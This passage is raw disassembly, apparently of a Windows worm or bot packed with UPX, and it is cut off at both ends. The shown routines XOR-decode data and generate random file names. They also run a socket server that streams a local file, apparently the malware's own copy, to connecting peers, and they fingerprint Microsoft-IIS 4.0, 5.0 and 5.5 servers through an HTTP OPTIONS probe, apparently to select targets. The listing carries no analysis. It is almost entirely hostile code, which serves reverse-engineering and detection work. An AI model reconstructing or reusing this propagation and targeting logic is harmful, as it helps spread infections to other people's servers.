push [ebp+var_14]
push [ebp+var_4]
call sub_412448
add esp, 14h
test eax, eax
jz short loc_4126E5
jmp short loc_4126B8
; ---------------------------------------------------------------------------
loc_4126E5: ; CODE XREF: sub_4125DF+102�j
mov eax, [ebp+var_10]
mov cl, byte ptr [ebp+var_C]
mov [eax+12h], cl
and [ebp+var_18], 0
jmp short loc_4126FB
; ---------------------------------------------------------------------------
loc_4126F4: ; CODE XREF: sub_4125DF+137�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_4126FB: ; CODE XREF: sub_4125DF+113�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jnb short loc_412718
mov eax, [ebp+var_4]
add eax, [ebp+var_18]
mov al, [eax]
xor al, byte ptr [ebp+var_C]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_18]
mov [ecx], al
jmp short loc_4126F4
; ---------------------------------------------------------------------------
loc_412718: ; CODE XREF: sub_4125DF+122�j
mov eax, [ebp+var_14]
add eax, 1Ch
locret_41271E: ; CODE XREF: sub_4125DF+E�j
; sub_4125DF+49�j
leave
retn
sub_4125DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412720 proc near ; CODE XREF: sub_412A3A+C�p
; sub_412BC9+DF�p ...
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_E4 = byte ptr -0E4h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_194], eax
and [ebp+var_190], 0
loc_412741: ; CODE XREF: sub_412720:loc_41278A�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_190]
mov [ebp+ecx+var_10], al
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
mov eax, [ebp+var_190]
cmp eax, [ebp+var_194]
jnz short loc_41278A
push offset dword_418620
mov eax, [ebp+var_190]
lea eax, [ebp+eax+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_41278C
; ---------------------------------------------------------------------------
loc_41278A: ; CODE XREF: sub_412720+4F�j
jmp short loc_412741
; ---------------------------------------------------------------------------
loc_41278C: ; CODE XREF: sub_412720+68�j
push 17Ch
push offset dword_41CA18
lea eax, [ebp+var_18C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 17Ch
lea eax, [ebp+var_18C]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
leave
retn
sub_412720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127D0 proc near ; CODE XREF: sub_412A3A+14D�p
; sub_412BC9+133�p ...
var_24C = byte ptr -24Ch
var_22C = byte ptr -22Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24Ch
cmp ds:dword_41EBEC, 0
jnz loc_4128A0
mov ds:dword_41EBEC, 1
and [ebp+var_20C], 0
jmp short loc_412806
; ---------------------------------------------------------------------------
loc_4127F9: ; CODE XREF: sub_4127D0:loc_41289B�j
mov eax, [ebp+var_20C]
inc eax
mov [ebp+var_20C], eax
loc_412806: ; CODE XREF: sub_4127D0+27�j
mov eax, [ebp+var_20C]
imul eax, 0Ch
cmp ds:off_41DB18[eax], 0
jz loc_4128A0
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push ds:off_41DB18[eax]
lea eax, [ebp+var_22C]
push eax
call sub_407A56
add esp, 0Ch
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push ds:off_41CBA0[eax]
lea eax, [ebp+var_24C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_22C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_22C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_41289B
mov ds:dword_41EBF0, 1
jmp short loc_4128A0
; ---------------------------------------------------------------------------
loc_41289B: ; CODE XREF: sub_4127D0+BD�j
jmp loc_4127F9
; ---------------------------------------------------------------------------
loc_4128A0: ; CODE XREF: sub_4127D0+10�j
; sub_4127D0+46�j ...
cmp ds:dword_41EBF0, 0
jz short loc_4128AE
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128AE: ; CODE XREF: sub_4127D0+D7�j
push offset aRb ; "rb"
push offset dword_41ED10
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4128CC
xor eax, eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128CC: ; CODE XREF: sub_4127D0+F6�j
and [ebp+var_4], 0
loc_4128D0: ; CODE XREF: sub_4127D0+145�j
push [ebp+var_8]
push 200h
push 1
lea eax, [ebp+var_208]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412900
push [ebp+var_8]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_412900: ; CODE XREF: sub_4127D0+120�j
push [ebp+var_4]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
jmp short loc_4128D0
; ---------------------------------------------------------------------------
locret_412917: ; CODE XREF: sub_4127D0+DC�j
; sub_4127D0+FA�j ...
leave
retn
sub_4127D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412919 proc near ; CODE XREF: sub_412BC9+E8�p
; sub_412D56+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412938
xor eax, eax
jmp short locret_41294C
; ---------------------------------------------------------------------------
loc_412938: ; CODE XREF: sub_412919+19�j
push 0
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov eax, [ebp+var_4]
locret_41294C: ; CODE XREF: sub_412919+1D�j
leave
retn
sub_412919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41294E proc near ; CODE XREF: sub_412BC9+115�p
; sub_412D56+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_412964
; ---------------------------------------------------------------------------
loc_41295D: ; CODE XREF: sub_41294E:loc_4129C3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_412964: ; CODE XREF: sub_41294E+D�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp ds:off_41CDAE[eax], 0
jz short loc_4129C5
mov eax, [ebp+var_8]
imul eax, 3Ah
mov eax, ds:dword_41CDA6[eax]
cmp eax, [ebp+arg_0]
jnz short loc_4129C3
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CD80
mov [ebp+var_4], eax
push 3Ah
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
push [ebp+arg_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
call sub_4105FB
pop ecx
mov eax, [ebp+arg_4]
add eax, 13h
push eax
call sub_4105FB
pop ecx
jmp short loc_4129C5
; ---------------------------------------------------------------------------
loc_4129C3: ; CODE XREF: sub_41294E+34�j
jmp short loc_41295D
; ---------------------------------------------------------------------------
loc_4129C5: ; CODE XREF: sub_41294E+23�j
; sub_41294E+73�j
mov eax, [ebp+var_4]
leave
retn
sub_41294E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4129CA proc near ; CODE XREF: sub_412A3A+16B�p
; sub_412BC9+15A�p ...
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 104h
push 1
mov eax, [ebp+arg_0]
add eax, 2Ah
push eax
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_104], eax
lea eax, [ebp+var_100]
push eax
push [ebp+arg_8]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_412A11
push offset aUnknown ; "unknown"
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_412A11: ; CODE XREF: sub_4129CA+32�j
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_104]
inc eax
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push offset dword_41A1D0
push offset dword_41DB88
call sub_40D4AB
add esp, 18h
leave
retn
sub_4129CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A3A proc near ; CODE XREF: sub_41331E+148�p
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_235 = byte ptr -235h
var_222 = dword ptr -222h
var_20C = dword ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push [ebp+arg_4]
call sub_412720
pop ecx
push 3Ah
push [ebp+arg_0]
lea eax, [ebp+var_248]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_248]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_235]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_20C+3]
mov [ebp+var_8], eax
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
and [ebp+var_4], 0
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A9F: ; CODE XREF: sub_412A3A+8A�j
; sub_412A3A:loc_412B7F�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412AA6: ; CODE XREF: sub_412A3A+63�j
cmp [ebp+var_4], 3Ch
jnz short loc_412AB1
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AB1: ; CODE XREF: sub_412A3A+70�j
push 3E8h
push [ebp+arg_4]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412AC6
jmp short loc_412A9F
; ---------------------------------------------------------------------------
loc_412AC6: ; CODE XREF: sub_412A3A+88�j
push 200h
push [ebp+var_8]
push [ebp+arg_4]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0FFFFFFFFh
jnz short loc_412AED
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AED: ; CODE XREF: sub_412A3A+AC�j
cmp [ebp+var_24C], 0
jz short loc_412B69
and [ebp+var_250], 0
jmp short loc_412B0C
; ---------------------------------------------------------------------------
loc_412AFF: ; CODE XREF: sub_412A3A:loc_412B34�j
mov eax, [ebp+var_250]
inc eax
mov [ebp+var_250], eax
loc_412B0C: ; CODE XREF: sub_412A3A+C3�j
mov eax, [ebp+var_250]
cmp eax, [ebp+var_24C]
jnb short loc_412B36
mov eax, [ebp+var_250]
mov eax, [ebp+eax+var_20C]
cmp eax, [ebp+var_222]
jnz short loc_412B34
jmp loc_412BC5
; ---------------------------------------------------------------------------
loc_412B34: ; CODE XREF: sub_412A3A+F3�j
jmp short loc_412AFF
; ---------------------------------------------------------------------------
loc_412B36: ; CODE XREF: sub_412A3A+DE�j
push 3
mov eax, [ebp+var_24C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 200h
push 0
push [ebp+var_8]
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_412B7F
; ---------------------------------------------------------------------------
loc_412B69: ; CODE XREF: sub_412A3A+BA�j
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_412B7F: ; CODE XREF: sub_412A3A+12D�j
jmp loc_412A9F
; ---------------------------------------------------------------------------
loc_412B84: ; CODE XREF: sub_412A3A:loc_412BC5�j
push [ebp+arg_4]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412B93
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412B93: ; CODE XREF: sub_412A3A+155�j
push offset dword_41CD14
push [ebp+arg_4]
lea eax, [ebp+var_248]
push eax
push [ebp+arg_0]
call sub_4129CA
add esp, 10h
push 1
push [ebp+arg_4]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412BC5: ; CODE XREF: sub_412A3A+F5�j
jmp short loc_412B84
; ---------------------------------------------------------------------------
locret_412BC7: ; CODE XREF: sub_412A3A+72�j
; sub_412A3A+AE�j ...
leave
retn
sub_412A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BC9 proc near ; CODE XREF: sub_41331E+165�p
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = byte ptr -84Ch
var_810 = dword ptr -810h
var_80C = dword ptr -80Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 85Ch
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_404FE7
add esp, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_854], 3Ch
and [ebp+var_850], 0
and [ebp+var_810], 0
loc_412BFD: ; CODE XREF: sub_412BC9+A9�j
and [ebp+var_85C], 0
jmp short loc_412C13
; ---------------------------------------------------------------------------
loc_412C06: ; CODE XREF: sub_412BC9:loc_412C35�j
mov eax, [ebp+var_85C]
inc eax
mov [ebp+var_85C], eax
loc_412C13: ; CODE XREF: sub_412BC9+3B�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnb short loc_412C37
mov eax, [ebp+var_85C]
mov eax, [ebp+eax*4+var_80C]
cmp eax, [ebp+var_8]
jnz short loc_412C35
jmp short loc_412C37
; ---------------------------------------------------------------------------
loc_412C35: ; CODE XREF: sub_412BC9+68�j
jmp short loc_412C06
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412BC9+56�j
; sub_412BC9+6A�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnz short loc_412C6E
cmp [ebp+var_810], 200h
jnb short loc_412C6E
mov eax, [ebp+var_85C]
mov ecx, [ebp+var_8]
mov [ebp+eax*4+var_80C], ecx
mov eax, [ebp+var_810]
inc eax
mov [ebp+var_810], eax
loc_412C6E: ; CODE XREF: sub_412BC9+7A�j
; sub_412BC9+86�j
xor eax, eax
test eax, eax
jnz short loc_412BFD
lea eax, [ebp+var_854]
push eax
push 0
lea eax, [ebp+var_810]
push eax
push 0
push 0
call ds:dword_41722C ; select
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_412CA5
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp locret_412D4A
; ---------------------------------------------------------------------------
loc_412CA5: ; CODE XREF: sub_412BC9+CC�j
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_858], eax
cmp [ebp+var_858], 0
jnz short loc_412CD1
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CD1: ; CODE XREF: sub_412BC9+FB�j
lea eax, [ebp+var_84C]
push eax
push [ebp+var_858]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412CF9
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CF9: ; CODE XREF: sub_412BC9+123�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412D11
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412D11: ; CODE XREF: sub_412BC9+13B�j
push offset dword_41CD18
push [ebp+var_8]
lea eax, [ebp+var_84C]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
locret_412D4A: ; CODE XREF: sub_412BC9+D7�j
; sub_412BC9+106�j ...
leave
retn
sub_412BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D4C proc near ; CODE XREF: sub_41331E:loc_413420�p
push ebp
mov ebp, esp
mov eax, offset dword_41EBF4
pop ebp
retn
sub_412D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D56 proc near ; DATA XREF: sub_412E04+CA�o
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jnz short loc_412D8A
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412D8A: ; CODE XREF: sub_412D56+25�j
lea eax, [ebp+var_44]
push eax
push [ebp+var_48]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412DAE
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DAE: ; CODE XREF: sub_412D56+49�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412DC8
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DC8: ; CODE XREF: sub_412D56+63�j
push offset dword_41CD1C
push [ebp+var_8]
lea eax, [ebp+var_44]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
locret_412E00: ; CODE XREF: sub_412D56+32�j
; sub_412D56+56�j ...
leave
retn 4
sub_412D56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E04 proc near ; DATA XREF: sub_412F07+B0�o
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_1AA = byte ptr -1AAh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B8h
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_1B4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1B0]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412E59
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_412F03
; ---------------------------------------------------------------------------
loc_412E59: ; CODE XREF: sub_412E04+40�j
lea eax, [ebp+var_1B0]
push eax
mov eax, [ebp+var_1B4]
push dword ptr [eax]
push offset dword_41CD20
lea eax, [ebp+var_1AA]
push eax
call sub_40D53F
add esp, 10h
lea eax, [ebp+var_1B0]
push eax
push offset dword_41EBF4
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_412E8F: ; CODE XREF: sub_412E04+B7�j
; sub_412E04:loc_412EEA�j
mov eax, [ebp+var_1B4]
cmp dword ptr [eax+4], 0
jz short loc_412E9D
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412E9D: ; CODE XREF: sub_412E04+95�j
push 3E8h
push [ebp+var_4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1B8], eax
cmp [ebp+var_1B8], 0FFFFFFFFh
jnz short loc_412EBD
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EBD: ; CODE XREF: sub_412E04+B5�j
cmp [ebp+var_1B8], 0
jnz short loc_412EC8
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412EC8: ; CODE XREF: sub_412E04+C0�j
push [ebp+var_1B8]
push offset sub_412D56
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_412EEA
push [ebp+var_1B8]
call sub_4053B1
pop ecx
loc_412EEA: ; CODE XREF: sub_412E04+D8�j
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EEC: ; CODE XREF: sub_412E04+97�j
; sub_412E04+C2�j
push [ebp+var_4]
call sub_404CBB
pop ecx
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
locret_412F03: ; CODE XREF: sub_412E04+50�j
leave
retn 4
sub_412E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F07 proc near ; CODE XREF: sub_40A9CF+F6E�p
; sub_41349C+2C7�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_412F26
jmp locret_412FC4
; ---------------------------------------------------------------------------
loc_412F26: ; CODE XREF: sub_412F07+18�j
cmp [ebp+arg_4], 0
jz short loc_412F3A
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
jmp short loc_412F4E
; ---------------------------------------------------------------------------
loc_412F3A: ; CODE XREF: sub_412F07+23�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_412F4E: ; CODE XREF: sub_412F07+31�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_412F63
cmp [ebp+var_4], 0FFFFh
jbe short loc_412F77
loc_412F63: ; CODE XREF: sub_412F07+51�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_412F77: ; CODE XREF: sub_412F07+5A�j
push 0Ah
mov eax, [ebp+var_8]
add eax, 4
push eax
push [ebp+var_4]
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_4]
push offset dword_41CD58
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_412E04
call sub_4095A4
add esp, 14h
locret_412FC4: ; CODE XREF: sub_412F07+1A�j
leave
retn
sub_412F07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FC6 proc near ; CODE XREF: UPX0:004168CB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_412FD8
; ---------------------------------------------------------------------------
loc_412FD1: ; CODE XREF: sub_412FC6:loc_413088�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412FD8: ; CODE XREF: sub_412FC6+9�j
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp ds:off_41CDAE[eax], 0
jz locret_41308D
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ecx, ds:dword_41CDA6[ecx]
and ecx, 0FFh
mov eax, ds:off_41CDAE[eax]
sub eax, ecx
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ds:off_41CDAE[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
and ds:dword_41CDAA[eax], 0
loc_413024: ; CODE XREF: sub_412FC6+7E�j
; sub_412FC6+BE�j
call sub_410422
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ds:dword_41CDA6[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp ds:dword_41CDA6[eax], 0
jnz short loc_413046
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413046: ; CODE XREF: sub_412FC6+7C�j
and [ebp+var_8], 0
jmp short loc_413053
; ---------------------------------------------------------------------------
loc_41304C: ; CODE XREF: sub_412FC6:loc_413086�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_413053: ; CODE XREF: sub_412FC6+84�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp ds:off_41CDAE[eax], 0
jz short loc_413088
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jz short loc_413086
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_8]
imul ecx, 3Ah
mov eax, ds:dword_41CDA6[eax]
cmp eax, ds:dword_41CDA6[ecx]
jnz short loc_413086
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: sub_412FC6+A2�j
; sub_412FC6+BC�j
jmp short loc_41304C
; ---------------------------------------------------------------------------
loc_413088: ; CODE XREF: sub_412FC6+9A�j
jmp loc_412FD1
; ---------------------------------------------------------------------------
locret_41308D: ; CODE XREF: sub_412FC6+1F�j
leave
retn
sub_412FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41308F proc near ; CODE XREF: sub_41331E+72�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 820h
push 16h
push offset aOptionsHttp1_0 ; "OPTIONS / HTTP/1.0\r\n\r\n"
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_4130C4
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130C4: ; CODE XREF: sub_41308F+2C�j
push 0
push 800h
lea eax, [ebp+var_810]
push eax
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4130F3
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4130F3
cmp [ebp+var_8], 800h
jnz short loc_4130FA
loc_4130F3: ; CODE XREF: sub_41308F+53�j
; sub_41308F+59�j
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130FA: ; CODE XREF: sub_41308F+62�j
mov eax, [ebp+var_8]
and [ebp+eax+var_810], 0
and [ebp+var_4], 0
push offset aServer ; "Server:"
lea eax, [ebp+var_810]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_41312C
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41312C: ; CODE XREF: sub_41308F+94�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+var_10]
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413150
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413150: ; CODE XREF: sub_41308F+B8�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413173
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413173: ; CODE XREF: sub_41308F+DB�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
push 0Dh
push offset aMicrosoftIis ; "Microsoft-IIS"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41323C
and [ebp+var_818], 0
and [ebp+var_814], 0
lea eax, [ebp+var_814]
push eax
lea eax, [ebp+var_818]
push eax
push offset aMicrosoftIisU_ ; "Microsoft-IIS/%u.%u"
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 10h
cmp [ebp+var_818], 4
jnz short loc_4131E9
cmp [ebp+var_814], 0
jnz short loc_4131E9
push 4
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4131E9: ; CODE XREF: sub_41308F+147�j
; sub_41308F+150�j
cmp [ebp+var_818], 5
jnz short loc_413203
cmp [ebp+var_814], 0
jnz short loc_413203
push 3
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413203: ; CODE XREF: sub_41308F+161�j
; sub_41308F+16A�j
cmp [ebp+var_818], 5
jnz short loc_41321D
cmp [ebp+var_814], 5
jnz short loc_41321D
push 2
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41321D: ; CODE XREF: sub_41308F+17B�j
; sub_41308F+184�j
